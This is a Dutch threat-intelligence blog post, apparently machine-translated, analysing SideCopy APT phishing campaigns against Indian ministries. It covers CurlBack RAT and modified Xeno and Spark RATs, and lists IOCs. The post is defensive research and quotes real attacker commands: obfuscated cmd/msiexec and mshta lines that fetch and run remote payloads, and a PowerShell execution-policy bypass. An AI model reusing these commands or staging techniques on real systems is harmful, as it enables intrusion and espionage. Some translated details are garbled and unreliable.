• Producten en services
        • Cloud

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Kleine bedrijven

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cyberbeveiliging & Data Privacy Bewustzijn
  • Oplossingen
    • BFSI
    • Educatie
    • Overheid
    • Gezondheidszorg
    • ITeS
    • Productie
  • Over ons
    • Over ons Seqrite
    • Leiderschap
    • Onderscheidingen en certificeringen
    • Newsroom
  • Partners
    • Partner Program
    • Partner zoeken
    • Word een Partner
  • Support
  • Informatiebronnen
    • Blogs
    • Whitepapers
    • Datasheets
    • Casestudies
    • Bedreigingsrapporten
    • Handleidingen
    • PoV
    • Begrip Data Privacy
    • Check uw risicoscore
    • DPDP-dialogen
    • Privacy-uur
Seqrite <font dir="auto" style="vertical-align: inherit;">Labs</font> Blog
Contact Onder aanval?
  • Producten en services
        • Cloud

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Kleine bedrijven

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cyberbeveiliging & Data Privacy Bewustzijn
  • Oplossingen
    • BFSI
    • Educatie
    • Overheid
    • Gezondheidszorg
    • ITeS
    • Productie
  • Over ons
    • Over ons Seqrite
    • Leiderschap
    • Onderscheidingen en certificeringen
    • Newsroom
  • Partners
    • Partner Program
    • Partner zoeken
    • Word een Partner
  • Support
  • Informatiebronnen
    • Blogs
    • Whitepapers
    • Datasheets
    • Casestudies
    • Bedreigingsrapporten
    • Handleidingen
    • PoV
    • Begrip Data Privacy
    • Check uw risicoscore
    • DPDP-dialogen
    • Privacy-uur
Home  /  Phishing  / Vaarwel HTA, hallo MSI: nieuwe TTP's en clusters van een APT aangestuurd door multi-platform aanvallen
Vaarwel HTA, hallo MSI: nieuwe TTP's en clusters van een APT aangestuurd door multi-platform aanvallen
08 April 2025

Vaarwel HTA, hallo MSI: nieuwe TTP's en clusters van een APT aangestuurd door multi-platform aanvallen

Geschreven door Sathwik Ram Prakki
Sathwik Ram Prakki
Phishing

Seqrite Het Labs APT-team heeft nieuwe tactieken ontdekt van de aan Pakistan gelieerde SideCopy APT-groep, die sinds de laatste week van december 2024 actief is. De groep heeft haar doelwitten uitgebreid van de Indiase overheid, defensie, maritieme sector en universiteitsstudenten naar entiteiten onder de ministeries van spoorwegen, olie en gas en buitenlandse zaken. Een opvallende verandering in de recente campagnes is de overstap van HTML Application (HTA)-bestanden naar Microsoft Installer (MSI)-pakketten als primair mechanisme voor de voorbereiding van de aanvallen.

Kwaadwillende actoren ontwikkelen voortdurend hun tactieken om detectie te omzeilen. Deze verschuiving wordt gedreven door hun aanhoudend gebruik van DLL-sideloading en inbraken op meerdere platforms. Deze evolutie omvat ook technieken zoals reflective loading en het hergebruiken van open-source tools zoals Xeno RAT en Spark RAT, in navolging van de trend met Async RAT, om de mogelijkheden ervan uit te breiden. Daarnaast is een nieuwe payload genaamd CurlBack RAT geïdentificeerd die het slachtoffer registreert bij de C2-server.

Belangrijkste bevindingen

  • Aanvallers doen zich via gebruikersnamen die gekoppeld zijn aan de e-mailadressen van hun medewerkers voor als overheidsmedewerkers met een achtergrond in cyberbeveiliging. Daarbij worden de gecompromitteerde e-mailadressen gebruikt.
  • Er wordt een vals domein gebruikt dat een e-overheidsdienst met een open directory nabootst en dat payloads en phishing-inlogpagina's host.
  • Dertien subdomeinen en URL's hosten inlogpagina's voor verschillende RTS-services voor meerdere City Municipal Corporations (CMC's), allemaal in de staat Maharashtra.
  • Het officiële domein van het National Hydrology Project (NHP), dat onder het Ministerie van Waterbeheer valt, is gehackt om schadelijke berichten te verspreiden.
  • Nieuwe tactieken zoals reflectief laden en AES-decodering van resource-secties via PowerShell om een ​​aangepaste versie van de op C# gebaseerde open-sourcetool XenoRAT te implementeren.
  • Een aangepaste variant van de op Golang gebaseerde open-sourcetool SparkRAT, gericht op Linux-platforms, is via dezelfde toneelspeler eerder gebruikt voor Poseidon en Ares RAT-ladingen.
  • Er wordt gebruikgemaakt van een nieuwe RAT genaamd CurlBack, die gebruikmaakt van DLL side-loading. Deze registreert het slachtoffer via UUID bij de C2-server en ondersteunt bestandsoverdracht via curl.
  • In januari 2025 en juni 2024 werden campagnes met het thema 'honingvallen' waargenomen, die samenvielen met de arrestatie van een overheidsmedewerker die ervan werd beschuldigd vertrouwelijke gegevens te hebben gelekt naar een Pakistaanse contactpersoon.
  • Een eerder gecompromitteerde onderwijsportal, die in augustus 2024 werd ontdekt, werd in februari 2025 weer actief met nieuwe URL's gericht op universiteitsstudenten. Deze gebruiken drie verschillende thema's: 'Klimaatverandering', 'Onderzoekswerk' en 'Professioneel'. (De volledige analyse is te zien in de opname.) hier, waarin zes verschillende clusters van SideCopy APT worden uitgelegd.
  • De moedergroep van SideCopy, APT36, richt zich al lange tijd op Afghanistan met een thema dat verband houdt met het Office of the Prisoners Administration (OPA) van het Islamitische Emiraat Afghanistan. Een recente campagne gericht op Linux-systemen met als thema "Leiderschap ontwikkelen voor toekomstige oorlogen" maakt gebruik van AES/RC4-gecodeerde stagers om de MeshAgent RMM-tool te laten vallen.

Doelsectoren onder het Indiase ministerie

  • Spoorwegen
  • OLIE & GAS
  • Buitenlandse Zaken
  • Defensie

Phishing-e-mails

De campagne, gericht op de defensiesector, begon met een phishingmail van 13 januari 2025 met als onderwerp "Update schema voor NDC 65 zoals besproken". De e-mail bevatte een link om een ​​bestand met de naam "NDC65-Updated-Schedule.pdf" te downloaden om de doelgroep te lokken.

Figuur 1 – NDC-phishing-e-mail (1)

Een tweede phishingmail, verzonden op 15 januari 2025 met als onderwerp "Beleidsupdate voor deze cursus.txt", bevat eveneens een phishinglink. Deze e-mail is afkomstig van een officieel ogend e-mailadres dat waarschijnlijk is gehackt. National Defence College (NDC) is een opleidingsinstituut voor defensie, gericht op strategische en praktische toepassing van nationale veiligheid, gevestigd in Delhi en valt onder het Indiase Ministerie van Defensie.

Figuur 2 – NDC-phishing-e-mail (2)

Het e-mailadres van de aanvaller, "gsosystems-ndc@outlook[.]com", werd aangemaakt op 10 januari 2025 in de VAE en was voor het laatst actief op 28 februari 2025. OSINT onthult een vergelijkbaar e-mailadres, "gsosystems.ndc-mod@nic[.]in", dat toebehoort aan het National Informatics Centre (NIC), een afdeling van het Indiase ministerie van Elektronica en Informatietechnologie (MeitY). De gebruikersnaam die aan het e-mailadres van de aanvaller is gekoppeld, doet zich voor als een overheidsmedewerker met een achtergrond in cybersecurity.

Figuur 3 – E-mail van aanvaller

Decoy-documenten

Het lokaas is verbonden aan het National Defence College (NDC) in India en bevat de jaarlijkse trainingskalender (studie & activiteiten) voor het jaar 2025 voor de 65e cursus (NDC-65). Het is gevestigd in New Delhi en is het opleidingsinstituut voor defensie en de belangrijkste plek voor strategische scholing voor officieren van de Defensiedienst (Indiase strijdkrachten) en de ambtenarij, die allemaal onder het Indiase Ministerie van Defensie vallen.

Figuur 4 – NDC-kalenderlokmiddel [Verdediging]
Een ander phishing-archiefbestand met de naam "2024-National-Holidays-RH-PER_N-1.zip" is beschikbaar in twee varianten en is gericht op Windows- of Linux-systemen. Zodra de payload wordt geactiveerd, leidt deze naar een afleidingsdocument met een lijst met feestdagen voor het personeel van de Open Line voor het jaar 2024, zoals de naam al doet vermoeden. Dit is een officiële mededeling van Southern Railway van 19 december 2023, specifiek voor de afdeling Chennai. Southern Railway (SR) is een van de achttien zones van Indian Railways, een staatsbedrijf van het Indiase Ministerie van Spoorwegen.

Figuur 5 – Vakantielijst-lokmiddel [Spoorwegen]
De derde infectieketen omvat een document getiteld "Cybersecurity Guidelines" voor het jaar 2024, dat lijkt te zijn uitgegeven door Hindustan Petroleum Corporation Limited (HPCL). HPCL, met hoofdkantoor in Mumbai, is een overheidsbedrijf in de petroleum- en aardgasindustrie en een dochteronderneming van de Oil and Natural Gas Corporation (ONGC), een staatsbedrijf van het Indiase ministerie van Petroleum en Aardgas.

Figuur 6 – Cybersecurityrichtlijnen als lokaas [Olie & Gas]
Een ander document dat verband houdt met dezelfde infectie is de "Pharmaceutical Product Catalogue" voor 2025, uitgegeven door MAPRA. Deze is specifiek bedoeld voor medewerkers van het Ministerie van Buitenlandse Zaken (MEA) in India. Mapra Laboratories Pvt. Ltd. is een farmaceutisch bedrijf met hoofdkantoor in Mumbai.

Figuur 7 – Cataloguslokmiddel [Externe Zaken]

OpenDir en CredPhish

Een nepdomein dat zich voordoet als de e-Governance-portaldiensten, is gebruikt om de campagne uit te voeren die gericht was op spoorwegmaatschappijen. Dit domein werd aangemaakt op 16 juni 2023 en bevat een open directory met meerdere bestanden die tijdens het onderzoek zijn geïdentificeerd.

Figuur 8 – Open directory

Er zijn in totaal 13 subdomeinen geïdentificeerd, die fungeren als inlogportalen voor verschillende systemen, zoals:

  • Webmail
  • Veiligheidstankbeheersysteem
  • Loonsysteem
  • Autoriteit instellen

Deze worden waarschijnlijk gebruikt voor phishing van inloggegevens, waarbij sinds vorig jaar actief meerdere legitieme overheidsportals worden nagebootst. Deze inlogpagina's zijn doorgaans gekoppeld aan RTS Services (Right to Public Services Act) en zijn bedoeld voor diverse City Municipal Corporations (CMC). Al deze nepportals zijn afkomstig uit steden in de staat Maharashtra:

  • Chandrapur
  • Gadchiroli
  • Akola
  • Satara
  • Vasai Virar
  • Ballarpur
  • Mira Bhaindar
Figuur 9 – Inlogportals gehost op een nepdomein

In de volgende tabel worden de geïdentificeerde subdomeinen en de data waarop ze voor het eerst zijn waargenomen, weergegeven:

Subdomeinen Eerst gezien
gadchiroli.egovservice[.]in 2024-12-16
pen.egovservice[.]in 2024-11-27
cpcontacts.egovservice[.]in

cpanel.egovservice[.]in

webdisk.egovservice[.]in

cpcalendars.egovservice[.]in

webmail.egovservice[.]in

2024-01-03
dss.egovservice[.]in

cmc.egovservice[.]in

2023-11-03
mail.egovservice[.]in 2023-10-13
pakola.egovservice[.]in

pakora.egovservice[.]in

2023-07-23
egovservice[.]in 2023-06-16

Al deze domeinen hebben de volgende DNS-geschiedenis, voornamelijk geregistreerd onder AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). Dit duidt op een mogelijke gecoördineerde infrastructuur die is opgezet om legitieme services na te bootsen en inloggegevens te verzamelen van nietsvermoedende gebruikers.

Figuur 10 – DNS-geschiedenis

Nader onderzoek in de openbare directory bracht aanvullende URL's aan het licht die verband hielden met het nepdomein. Deze URL's dienen waarschijnlijk vergelijkbare phishingdoeleinden en hosten ook nog meer misleidende content.

hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/

Cluster-A

Het eerste cluster van SideCopy's activiteiten toont een geavanceerde aanpak door zich tegelijkertijd te richten op zowel Windows- als Linux-omgevingen. Nieuwe Remote Access Trojans (RAT's) zijn aan hun arsenaal toegevoegd, waardoor ze diverse systemen effectiever kunnen infecteren.

Figuur 11 – Cluster A

Windows

Een spearfishing-e-maillink downloadt een archiefbestand met een dubbele extensie (.pdf.lnk). Deze bestanden worden gehost op domeinen die legitiem lijken:

hxxps://egovservice.in/dssrts/helpers/fonts/2024-Nationale-Feestdagen-RH-PER_N-1/
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/

De snelkoppeling start cmd.exe met argumenten die escape-tekens (^) gebruiken om detectie te omzeilen en de leesbaarheid te verminderen. Bij deze bestanden wordt een nieuwe machine-ID "dv-kevin" gezien, terwijl we normaal gesproken het voorvoegsel "desktop-" op die plek zien.

Figuur 12 – Snelkoppelingen met dubbele extensie

Het hulpprogramma msiexec.exe wordt gebruikt voor de installatie van MSI-pakketten die extern worden gehost. Het gebruikt de stille modus met de installatieschakelaar.

C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/
C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/

Het eerste domein imiteert een nep-e-overheidssite die te zien is bij het openen van een map, terwijl het tweede een gecompromitteerd domein is dat toebehoort aan het officiële Nationale Hydrologieproject, een entiteit onder het Ministerie van Waterbronnen. Het MSI-bestand bevat een .NET-uitvoerbaar bestand, ConsoleApp1.exe , dat meerdere base64-gecodeerde PE-bestanden plaatst. Eerst wordt het lokdocument in de map Public geplaatst en geopend, terwijl de overige PE-bestanden in ' C:\ProgramData\LavaSoft\ ' worden geplaatst. Daaronder bevinden zich twee DLL's:

  • Legitieme DLL: Sampeose.dll
  • Kwaadaardige DLL: DUI70.dll, geïdentificeerd als CurlBack RAT.
Figuur 13 – Dropper in MSI-pakket

CurlBack RAT

Naast de DLL's wordt een ondertekend Windows-binair bestand , girbesre.exe , met de oorspronkelijke naam CameraSettingsUIHost.exe, geplaatst. Bij uitvoering laadt het EXE-bestand de kwaadaardige DLL. De persistentie wordt bereikt door een HTA-script ( svnides.hta ) te plaatsen dat een registersleutel voor het EXE-bestand aanmaakt. Er werden twee verschillende voorbeelden van kwaadaardige DLL's gevonden, met compilatietijdstempels van 24-12-2024 en 30-12-2024.

Figuur 14 – Controle van respons '/antivmcommand'

CurlBack RAT controleert in eerste instantie de respons van een specifieke URL met de opdracht '/antivmcommand'. Als de respons "aan" is, gaat de RAT verder, anders beëindigt de RAT zichzelf en blijft de controle behouden. De RAT verzamelt systeeminformatie en alle aangesloten USB-apparaten met behulp van de registersleutel:

  • “SYSTEEM\\ControlSet001\\Enum\\USBSTOR”
Figuur 15 – Systeeminfo en USB-apparaten ophalen

Verbonden en actieve processen worden opgesomd om te controleren op Explorer, MSedge, Chrome, Notepad, TaskMgr, Services, Defender en Settings.

Figuur 16 – Weergaven en processen opsommen

Vervolgens genereert het een UUID voor clientregistratie bij de C2-server. De gegenereerde ID wordt samen met de gebruikersnaam opgeslagen in “ C:\Users\<gebruikersnaam>\.client_id.txt” .

Figuur 17 – Client-ID gegenereerd voor C2-registratie

Voordat de registratie met de ID plaatsvindt, wordt de persistentie ingesteld via een geplande taak met de naam " OneDrive " voor het legitieme binaire bestand, dat te vinden is op de locatie: " C:\Windows\System32\Tasks\OneDrive ".

Figuur 18 – Geplande taak

Omgekeerde strings toegevoegd aan het C2-domein en hun doel:

Draad Functionaliteit
/retsiger/ Cliënt registreren bij de C2
/sdnammoc/ Opdrachten ophalen van C2
/taebtraeh/ Controleer regelmatig de verbinding met C2
/stluser/ Resultaten uploaden naar de C2

Nadat de verbinding is geregistreerd, blijft deze actief om alle opdrachten op te halen die in het antwoord worden geretourneerd.

Figuur 19 – Reactie van opdrachten na registratie

Als het antwoord een waarde bevat, wordt het huidige tijdstempel opgehaald en wordt een van de volgende C2-opdrachten uitgevoerd:

commando Functionaliteit
info Systeeminformatie verzamelen
Download Bestanden downloaden van de host
volharding Persistentie-instellingen wijzigen
lopen Willekeurige opdrachten uitvoeren
extract Gegevens uit het systeem halen
toestemming Controleer en verhoog privileges
gebruikers Gebruikersaccounts opsommen
cmd Opdrachtregelbewerkingen uitvoeren
Figuur 20 – Procesprivileges controleren met de opdracht 'permission'

Andere basisfuncties zijn onder meer het ophalen van gebruikers- en hostgegevens, het extraheren van archiefbestanden en het aanmaken van taken. Strings en code tonen aan dat CURL in de schadelijke DLL aanwezig is om verschillende bestandsformaten te inventariseren en over te dragen:

  • Afbeeldingsbestanden: GIF, JPEG, JPG, SVG
  • Tekstbestanden: TXT, HTML, PDF, XML
Figuur 21 – Ondersteunde CURL-protocollen

Linux

Naast de op Windows gerichte aanvallen, richt het eerste cluster van SideCopy zich ook op Linux-omgevingen. Het kwaadaardige archiefbestand heeft dezelfde naam als de Windows-versie, maar met een wijzigingsdatum van 2024-12-20. Dit archief bevat een op Go gebaseerd ELF-binair bestand, wat wijst op een consistente platformoverschrijdende strategie. Analyse toont aan dat de functiestroom van de stager code-overeenkomsten vertoont met de stagers die geassocieerd worden met Poseidon en Ares RAT. Deze zijn respectievelijk gekoppeld aan Transparent Tribe en SideCopy APT's.

Figuur 22 – Golang Stager voor Linux

Stager functionaliteit:

  1. u gebruikt wget opdracht om een ​​lokaas te downloaden van egovservice domein in de doelmap /.local/delen en open het (Nationale-Feestdagen-RH-PER_N-1.pdf).
  2. Download de uiteindelijke payload elf as /.local/share/xdg-open en uitvoeren.
  3. Maak een crontab '/dev/shm/mycron' om persistentie te behouden na het opnieuw opstarten van het systeem voor de payload, onder de huidige gebruikersnaam.

De laatste payload die de stager levert, is Spark RAT, een open-source trojan voor toegang op afstand met cross-platform ondersteuning voor Windows-, macOS- en Linux-systemen. De RAT, geschreven in Golang en in 2022 uitgebracht op GitHub, is erg populair bij meer dan 500 forks. Spark RAT gebruikt het WebSocket-protocol en HTTP-verzoeken om te communiceren met de C2-server.

Afbeelding 23 – Aangepaste Spark RAT 'thunder' verbinding met C2

Spark RAT ondersteunt onder andere procesbeheer en -beëindiging, netwerkverkeersbewaking, bestandsverkenning en -overdracht, bestandsbewerking en -verwijdering, codemarkering, bureaubladbewaking, screenshots maken, OS-informatie ophalen en toegang tot externe terminals. Daarnaast ondersteunt het energiebeheerfuncties zoals afsluiten, opnieuw opstarten, afmelden, slaapstand, sluimerstand en vergrendelschermfuncties.

Cluster-B

Het tweede cluster van SideCopy-activiteiten richt zich op Windows-systemen, hoewel we vermoeden dat het vooral Linux-systemen als doelwit heeft, gezien de infrastructuur die sinds 2023 is waargenomen.

Afbeelding 24 – Cluster B

De infectie begint met een spearfishing-e-maillink die een archiefbestand downloadt met de naam 'NDC65-Updated-Schedule.zip'. Dit bestand bevat een snelkoppeling in dubbele extensie-indeling die een extern HTA-bestand activeert dat gehost wordt op een ander gecompromitteerd domein:

  • “hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe”
Figuur 25 – Archief met kwaadaardige LNK

De machine-ID die aan de LNK "desktop-ey8nc5b" is gekoppeld, is al in eerdere SideCopy-campagnes waargenomen, hoewel de wijzigingsdatum '2023:05:26' suggereert dat het mogelijk een oudere versie betreft die hergebruikt wordt. Parallel aan de MSI-stagers blijft de groep HTA-gebaseerde stagers gebruiken die vrijwel volledig onopgemerkt blijven (FUD).

Figuur 26 – Bijna FUD-stager van HTA

Het HTA-bestand bevat een Base64-gecodeerde .NET-payload, BroaderAspect.dll , die wordt gedecodeerd en direct in het geheugen van MSHTA wordt geladen. Dit binaire bestand opent het gedropte NDC-lokdocument in de map ProgramData en een extra .NET-stager als PDF in de map Public . De persistentie wordt ingesteld via de registersleutel Run met de naam "Edgre" en wordt uitgevoerd als:

  • cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

Gecodeerde payload

Het verwijderde .NET-binaire bestand met de naam 'Myapp.pdb' heeft twee bronbestanden:

  • “Mijnapp.Bronnen.Document.pdf”
  • “Mijnapp.Eigenschappen.Bronnen.Bronnen”

De eerste is gedecodeerd met behulp van de Caesar-cijfermethode met een verschuiving van 9 tekens in achterwaartse richting. Het bestand is opgeslagen als ' Public\Downloads\Document.pdf ' (122.98 KB) en is een GIAC-publicatie uit 2004 over "Geavanceerde communicatietechnieken van Trojaanse paarden voor toegang op afstand op Windows-besturingssystemen".

Figuur 27 – Document met bijgevoegde lading

Hoewel het geen lokmiddel is, wordt er aan het einde een versleutelde payload toegevoegd. De malware zoekt naar de markering " %%EOF " om PDF-gegevens van EXE-gegevens te scheiden. De PDF-gegevens worden vanaf het begin tot aan de markering geëxtraheerd, terwijl de EXE-gegevens worden geëxtraheerd nadat 6 bytes na de markering zijn overgeslagen.

Figuur 28 – EXE extraheren na EOF-marker

Na enige vertraging worden de EXE-gegevens als “ Public\Downloads\suport.exe ” (49.53 KB) opgeslagen en samen met een sleutel als argument meegegeven om een ​​PowerShell-opdracht te activeren.

Figuur 29 – Bronnen extraheren en PowerShell activeren

PowerShell-fase

Er wordt een PowerShell-opdracht uitgevoerd met de basisargumenten "-NoProfile -ExecutionPolicy Bypass -Command" om beleid en profielen te negeren. Er worden twee parameters verzonden:

  • -EPath 'C:\\Users\\Public\\Downloads\\suport.exe'
  • -EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='

Na enige vertraging wordt de encryptiesleutel gedecodeerd vanuit Base64 en worden de eerste 16 bytes behandeld als de IV voor AES-encryptie (CBC-modus met PKCS7-padding). Dit wordt gedaan om het gedecodeerde binaire bestand als een .NET-assembly rechtstreeks in het geheugen te laden en het invoerpunt aan te roepen.

Figuur 30 – PowerShell-decodering

Aangepaste Xeno RAT

Het dumpen van de laatste .NET-payload met de naam 'DevApp.exe' leidt ons naar bekende functies in Xeno RAT. Het is een open-source trojan voor toegang op afstand die voor het eerst eind 2023 werd ontdekt. ​​Belangrijke functies zijn onder andere HVNC, live microfoontoegang, sokken5 reverse proxy, UAC-bypass, keylogger en meer. De aangepaste variant die SideCopy gebruikt, heeft basismethoden voor stringmanipulatie toegevoegd met C2 en poort 79.141.161[.]58:1256.

Afbeelding 31 – Aangepaste Xeno RAT

Vorig jaar werd een aangepaste Xeno RAT-variant genaamd MoonPeak gebruikt door een aan Noord-Korea gelinkte APT die werd gevolgd als UAT-5394. Ook Chineestalige partijen zoals DragonSpark en TAG-100 hebben aangepaste Spark RAT-varianten in gebruik genomen.

Infrastructuur en Attributie

Domeinen die door de cybercriminelen worden gebruikt voor het hosten van malware. De meeste hebben GoDaddy.com, LLC als registrar.

Stagingdomein Eerst gezien Gemaakt ASN
modspaceinterior[.]com jan 2025 september 2024 AS 46606 – GoDaddy
drjagrutichavan[.]com jan 2025 oktober 2021 AS 394695 – GoDaddy
nhp.mowr[.]gov[.]in december 2024 2005th Feb XNUMX AS 4758 – Nationaal Informatica Centrum
egovservice[.]in december 2024 Juni 2023 AS 140641 – GoDaddy
pmshriggssssiwan[.]in november 2024 Mar 2024 AS 47583 – Hostinger
onderwijsportalen[.]in augustus 2024 augustus 2024 AS 22612 – NameCheap

C2-domeinen zijn vlak voor de campagne aangemaakt in de laatste week van december 2024. Via de Canadese registrar "Internet Domain Service BS Corp." worden ze omgezet naar IP's met Cloudflare ASN 13335 in Californië.

C2-domein Gemaakt IP ASN
updates.widgetservicecenter[.]com 2024-Dec-25 104.21.15[.]163

172.67.163[.]31

 

ASN 13335 – Clouflare
updates.biossysinternal[.]com 2024-Dec-23 172.67.167[.]230

104.21.13[.]17

ASN 202015 – HZ Hosting Ltd.

De C2 voor Xeno RAT 79.141.161[.]58 heeft een unieke algemene naam (CN=PACKERP-63KUN8U) bij HZ Hosting Limited van ASN 202015. De poort die voor communicatie wordt gebruikt, is 1256, maar er wordt ook een open RDP-poort 56777 waargenomen.

Figuur 32 – Diamantmodel

Beide C2-domeinen zijn gekoppeld aan Cloudflare ASN 13335, dat wordt omgezet naar het IP-bereik 172.67.xx.xx. Vergelijkbare C2-domeinen op deze ASN zijn eerder door SideCopy gebruikt bij aanvallen gericht op de maritieme sector. Gezien de eerdere infectieclusters, de waargenomen TTP's en de gehoste open directory's, kunnen deze campagnes met nieuwe TTP's met grote zekerheid aan SideCopy worden toegeschreven.

Conclusie

De aan Pakistan gelinkte SideCopy APT-groep heeft haar tactieken sinds eind december 2024 aanzienlijk ontwikkeld en haar doelwitten uitgebreid met kritieke sectoren zoals spoorwegen, olie en gas en ministeries van Buitenlandse Zaken. De groep is overgestapt van het gebruik van HTA-bestanden naar MSI-pakketten als primair stagingmechanisme en blijft geavanceerde technieken gebruiken zoals DLL sideloading, reflection loading en AES-decryptie via PowerShell. Daarnaast maken ze gebruik van aangepaste open-sourcetools zoals Xeno RAT en Spark RAT, en implementeren ze de onlangs geïdentificeerde CurlBack RAT. Gecompromitteerde domeinen en nepwebsites worden gebruikt voor phishing van inloggegevens en payloadhosting, wat de voortdurende inspanningen van de groep onderstreept om de persistentie te verbeteren en detectie te ontwijken.

SEQRITE Bescherming

  • LNK.SideCopy.49245.Gen
  • LNK.Trojan.49363.GC
  • Zijkopie.Mal.49246.GC
  • HTA.SideCopy.49248.Gen
  • HTA.SideCopy.49247.Gen
  • HTA.Trojan.49362.GC
  • Trojan.Fmq

IOCs

Windows

a5410b76d0cb36786e00d2968d3ab6e4 2024-Nationale-Feestdagen-RH-PER_N-1.zip
f404496abccfa93eed5dfda9d8a53dc6 2024-Nationale-Feestdagen-RH-PER_N-1.pdf.lnk
0e57890a3ba16b1ac0117a624f262e61 Beveiligingsrichtlijnen.zip
57c2f8b4bbf4037439317a44c2263346 Beveiligingsrichtlijnen.pdf.lnk
53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi
97c3328427b72f05f120e9a98b6f9b09 installatiebestand.msi
0690116134586d41a23baed300fc6355 ConsoleApp1.exe
ef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe
9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll
589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll
0eb9e8bec7cc70d603d2d8b6efdd6bb5 update schema voor ndc 65 zoals besproken.txt
8ceeeec0e33026114f028cbb006cb7fc beleidsupdate voor deze course.txt
1d65fa0457a9917809660fff782689fe NDC65-Bijgewerkt-Schema.zip
7637cbfa99110fe8e1074e7ead66710e NDC65-Bijgewerkt-Schema.pdf.lnk
32a44a8f7b722b078b647e82cb9e85cf NDC65-Bijgewerkt-Schema.hta
a2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll
b45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf
83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf
cf6681cf1f765edb6cae81eeed389f78 ondersteuning.exe
c952aca2036d6646c0cffde9e6f22775 DevApp.exe (aangepaste Xeno RAT)

Linux

b5e71ff3932c5ef6319b7ca70f7ba8da 2024-Nationale-Feestdagen-RH-PER_N-1.zip
0a67bfda993152c93a212087677f9b60 2024-Nationale-Feestdagen-RH-PER_N-1․pdf
e165114280204c39e99cf0c650477bf8 clinsixfer.elf (aangepaste Spark RAT)

C2

79.141.161[.]58:1256 Xeno RAT
updates.widgetservicecenter[.]com

updates.biossysinternal[.]com

CurlBack RAT

URL's

hxxps://egovservice.in/dssrts/helpers/fonts/2024-Nationale-Feestdagen-RH-PER_N-1/
hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/
hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf
hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/
hxxps://updates.widgetservicecenter.com/antivmcommand
hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip
hxxps://modspaceinterior.com/wp-content/upgrade/01/
hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta
hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/

Staging-domeinen

modspaceinterior[.]com
drjagrutichavan[.]com
nhp.mowr[.]gov[.]in
pmshriggssssiwan[.]in
onderwijsportalen[.]in
egovservice[.]in
gadchiroli.egovservice[.]in

pen.egovservice[.]in

cpcontacts.egovservice[.]in

cpanel.egovservice[.]in

webdisk.egovservice[.]in

cpcalendars.egovservice[.]in

webmail.egovservice[.]in

www.dss.egovservice[.]in

www.cmc.egovservice[.]in

cmc.egovservice[.]in

dss.egovservice[.]in

mail.egovservice[.]in

www.egovservice[.]in

www.pakola.egovservice[.]in

pakola.egovservice[.]in

www.pakora.egovservice[.]in

pakora.egovservice[.]in

Gastheer en PDB

C:\ProgramData\LavaSoft\Sampeose.dll
C:\ProgramData\LavaSoft\DUI70.dll
C:\ProgramData\LavaSoft\girbesre.exe
